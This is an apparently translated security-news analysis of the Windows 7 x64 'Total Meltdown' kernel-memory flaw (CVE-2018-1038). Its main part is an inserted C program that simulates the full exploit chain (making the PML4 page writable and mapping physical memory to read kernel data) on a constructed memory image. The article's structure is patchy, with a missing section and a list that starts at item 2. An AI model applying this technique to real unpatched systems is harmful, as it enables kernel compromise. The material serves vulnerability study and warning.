
Microsoft TotalMeltdown vulnerability analysis and early warning

2025-01-21 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

In this issue the editor presents an analysis and early warning of the Microsoft TotalMeltdown vulnerability. The article is detailed and written from a professional point of view; I hope you get something out of it.

0x00 Vulnerability overview

A serious vulnerability, dubbed Total Meltdown, was found in the January and February 2018 Windows security updates for Windows 7 x64 and Windows Server 2008 R2. The updates mistakenly set the PML4 self-reference entry to user-mode permission, which lets any user-mode process read and write arbitrary kernel memory.

Microsoft addressed the issue in the out-of-band update KB4100480 for CVE-2018-1038. 360-CERT analyzed the vulnerability and recommends that affected users install the update, for example through 360 Security Guard.

0x01 Vulnerability impact

Severity: high

CVE: CVE-2018-1038

Affected versions:

Windows 7 x64

Windows Server 2008 R2

0x02 x64 paging principle

Intel x64 uses four-level paging: PML4 (Page Map Level 4), PDPT (Page Directory Pointer Table), PD (Page Directory) and PT (Page Table). Windows 7 x64 maps its own page tables into the kernel half of the address space through a self-reference: PML4 entry 0x1ED points back at the physical page that holds the PML4 itself, so the PML4 page appears at virtual address 0xFFFFF6FB7DBED000 (all four indices of that address equal 0x1ED). After the January and February 2018 security updates, that self-reference entry carries the User/Supervisor bit, so the page tables reached through it become accessible from user mode (readable and, because the entry is also marked writable, writable). The principle of the vulnerability is as follows.

Because the PML4 self-reference entry is user readable and writable,

an attacker can use the self-reference to modify entries in the PML4, PDPT, PD or PT.

Normal translation of a virtual address to a physical address:

PML4 -> PDPT -> PD -> PT -> PAGE -> physical address

Using the self-reference to reach protected data:

Step 1: change the protection bits of the target page (assume here that the PML4, PDPT, PD and PT entries on the path to the address are all user readable and writable; if they are not, the idea is the same). First obtain the address of the PTE that maps the page, using the self-reference:

Method: PML4 -> PML4 (self-reference) -> PDPT -> PD -> PT -> PTE

Set the protection bits in that PTE to user readable and writable.

Step 2: access the data directly through its normal virtual address. Because the permission bits were changed in step 1, the access no longer faults.

One caveat to keep in mind: the processor permits a user-mode access only when the U/S bit is set in every entry on the translation path, so a user-mode walk toward the PTE of a kernel address still faults at the supervisor-only kernel PML4 entry, even with the buggy self-reference. What the bug exposes unconditionally is the PML4 page itself, at 0xFFFFF6FB7DBED000 (all four indices 0x1ED), which user mode can now read and write; from there an attacker can install a new user-accessible PML4 entry that points to page tables under their own control.

The proof code is as follows:
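As an added, runnable illustration (written for this edit; it is not the article's proof-of-concept and not pcileech code), the following C program simulates the x64 four-level walk with the Intel U/S and R/W permission rule and a Windows 7-style PML4 self-reference in slot 0x1ED. It shows the address arithmetic from the paging section (0xFFFFF6FB7DBED000 is the self-reference applied four times; the PTE of any address is one extra trip through slot 0x1ED) and then runs the two-step idea above against a constructed memory image, both with the self-reference supervisor-only and with the Jan/Feb 2018 U/S bit set. The frame layout, the kernel and user addresses, the "kernel secret" contents and the function names (user_can_read, total_meltdown, leaks_kernel_secret) are this example's own assumptions; the 1 GiB huge-page PDPT used to finish the chain is one way to do it, not a claim about any specific tool.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Paging-structure entry bits (Intel SDM vol. 3A, sec. 4.5). */
#define PG_P    (1ULL << 0)  /* present */
#define PG_RW   (1ULL << 1)  /* writable */
#define PG_US   (1ULL << 2)  /* 1 = user-mode access permitted at this level */
#define PG_PS   (1ULL << 7)  /* in a PDPTE: the entry maps a 1 GiB page directly */
#define PFN_MASK 0x000FFFFFFFFFF000ULL
#define SELF    0x1EDULL     /* Windows 7 x64: the fixed PML4 self-reference slot */
#define NFRAMES 9

/* Constructed "physical memory", 9 frames of 4 KiB (assumed layout, not a real dump):
   0 PML4; 1-3 kernel PDPT/PD/PT; 4 kernel data; 5 attacker's user buffer; 6-8 user PDPT/PD/PT. */
static uint64_t mem[NFRAMES * 512];
#define TABLE(f) (mem + (f) * 512)
#define PHYS(f)  ((uint64_t)(f) * 4096)
static const uint64_t KVA = 0xFFFFF80000001000ULL; /* kernel data page: indices 0x1F0,0,0,1 */
static const uint64_t UVA = 0x0000080000000000ULL; /* attacker's buffer: indices 0x10,0,0,0 */

/* Assemble a canonical VA from four 9-bit table indices and a 12-bit page offset. */
uint64_t make_va(uint64_t i4, uint64_t i3, uint64_t i2, uint64_t i1, uint64_t off) {
    uint64_t va = (i4 << 39) | (i3 << 30) | (i2 << 21) | (i1 << 12) | off;
    return (va & (1ULL << 47)) ? va | 0xFFFF000000000000ULL : va;
}
/* VA of the PTE that maps 'va': one pass through PML4[SELF] shifts the walk down one level. */
uint64_t pte_va(uint64_t va) {
    return make_va(SELF, (va >> 39) & 0x1FF, (va >> 30) & 0x1FF, (va >> 21) & 0x1FF,
                   ((va >> 12) & 0x1FF) * 8);
}

/* Hardware walk with the permission rule: a user-mode access needs US=1 (and RW=1 for a
   write) in EVERY entry on the path. Returns 0 and the physical address, or -1 (page fault).
   Only 4 KiB pages and 1 GiB PDPTE pages are modelled. */
static int walk(uint64_t va, int user, int write, uint64_t *pa) {
    uint64_t frame = 0;                                  /* CR3: the PML4 lives in frame 0 */
    for (int lvl = 3; lvl >= 0; lvl--) {
        uint64_t e = TABLE(frame)[(va >> (12 + 9 * lvl)) & 0x1FF];
        if (!(e & PG_P) || (user && !(e & PG_US)) || (write && !(e & PG_RW))) return -1;
        if (lvl == 2 && (e & PG_PS)) {                   /* 1 GiB page: low 30 VA bits = offset */
            *pa = (e & PFN_MASK & ~0x3FFFFFFFULL) | (va & 0x3FFFFFFF);
            return *pa < PHYS(NFRAMES) ? 0 : -1;
        }
        frame = (e & PFN_MASK) >> 12;
        if (frame >= NFRAMES) return -1;
    }
    *pa = PHYS(frame) | (va & 0xFFF);
    return 0;
}
/* A user-mode load (write=0) or store (write=1) of n bytes inside one page. */
static int user_access(uint64_t va, int write, void *buf, size_t n) {
    uint64_t pa;
    if (n > 4096 - (va & 0xFFF) || walk(va, 1, write, &pa)) return -1;
    if (write) memcpy((uint8_t *)mem + pa, buf, n); else memcpy(buf, (uint8_t *)mem + pa, n);
    return 0;
}

static void build_tables(int buggy) {
    memset(mem, 0, sizeof mem);
    TABLE(0)[0x1F0] = PHYS(1) | PG_P | PG_RW;          /* kernel path: supervisor-only */
    TABLE(1)[0]     = PHYS(2) | PG_P | PG_RW;
    TABLE(2)[0]     = PHYS(3) | PG_P | PG_RW;
    TABLE(3)[1]     = PHYS(4) | PG_P | PG_RW;
    TABLE(0)[0x10]  = PHYS(6) | PG_P | PG_RW | PG_US;  /* user path: user-accessible */
    TABLE(6)[0]     = PHYS(7) | PG_P | PG_RW | PG_US;
    TABLE(7)[0]     = PHYS(8) | PG_P | PG_RW | PG_US;
    TABLE(8)[0]     = PHYS(5) | PG_P | PG_RW | PG_US;
    /* The self-reference: supervisor-only when correct; the Jan/Feb 2018 updates set US. */
    TABLE(0)[SELF]  = PHYS(0) | PG_P | PG_RW | (buggy ? PG_US : 0);
    strcpy((char *)TABLE(4), "kernel secret");
}
/* 1 if user mode can read 8 bytes at va on a system built with (1) or without (0) the bug. */
int user_can_read(uint64_t va, int buggy) {
    uint64_t v; build_tables(buggy);
    return user_access(va, 0, &v, 8) == 0;
}
/* The exploit chain, run in the simulator. Returns 1 and copies the kernel page into 'leak'. */
int total_meltdown(int buggy, char *leak, size_t n) {
    uint64_t pml4_va = make_va(SELF, SELF, SELF, SELF, 0), e, pte, pdpte, pml4e;
    build_tables(buggy);
    /* 1. Read the PML4 page itself: all four indices == SELF, i.e. 0xFFFFF6FB7DBED000. */
    if (user_access(pml4_va + SELF * 8, 0, &e, 8)) return 0;          /* faults unless buggy */
    /* 2. Learn our buffer's PFN from its PTE. (A kernel PTE is NOT reachable this way:
          PML4[0x1F0] on that path is still supervisor-only.) */
    if (user_access(pte_va(UVA), 0, &pte, 8)) return 0;
    /* 3. Turn the buffer into a PDPT whose entry 0 is a user-accessible 1 GiB page at phys 0. */
    pdpte = PG_P | PG_RW | PG_US | PG_PS;
    if (user_access(UVA, 1, &pdpte, 8)) return 0;
    /* 4. Install it in the free PML4 slot 0x11 through the now user-writable PML4 page. */
    pml4e = (pte & PFN_MASK) | PG_P | PG_RW | PG_US;
    if (user_access(pml4_va + 0x11 * 8, 1, &pml4e, 8)) return 0;
    /* 5. Physical memory is now mapped at make_va(0x11,0,0,0,0): read the kernel frame. */
    return user_access(make_va(0x11, 0, 0, 0, 0) + PHYS(4), 0, leak, n) == 0;
}
int leaks_kernel_secret(int buggy) {
    char leak[32] = {0};
    return total_meltdown(buggy, leak, sizeof leak) && strcmp(leak, "kernel secret") == 0;
}

int main(void) {
    printf("PML4 self-map 0x%016llx, PTE base 0x%016llx\n",
           (unsigned long long)make_va(SELF, SELF, SELF, SELF, 0), (unsigned long long)pte_va(0));
    printf("correct : kernel readable %d, leak %d\n", user_can_read(KVA, 0), leaks_kernel_secret(0));
    printf("buggy   : kernel readable %d, leak %d\n", user_can_read(KVA, 1), leaks_kernel_secret(1));
    return 0;
}
```

Two results are worth noting. With the bug alone, a direct user-mode read of the kernel page, or of its PTE through the self-reference, still faults, because the kernel PML4 entry on those paths is supervisor-only; only the PML4 page at 0xFFFFF6FB7DBED000 becomes readable and writable. That one page is enough: once an attacker can write a PML4 entry, every lower-level check is under their control.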

0x04 Principle of the pcileech tool

Based on this vulnerability, Ulf Frisk, who discovered it and maintains the memory acquisition tool pcileech, updated pcileech to version 3.2 with support for exploiting it.

2. Download the dedicated detection tool: http://down.360safe.com/totalmeltdown_fix.exe

The above is the analysis and early warning of the Microsoft TotalMeltdown vulnerability shared by the editor. If you have similar questions, the analysis above may help you understand the issue. To learn more, follow the industry information channel.
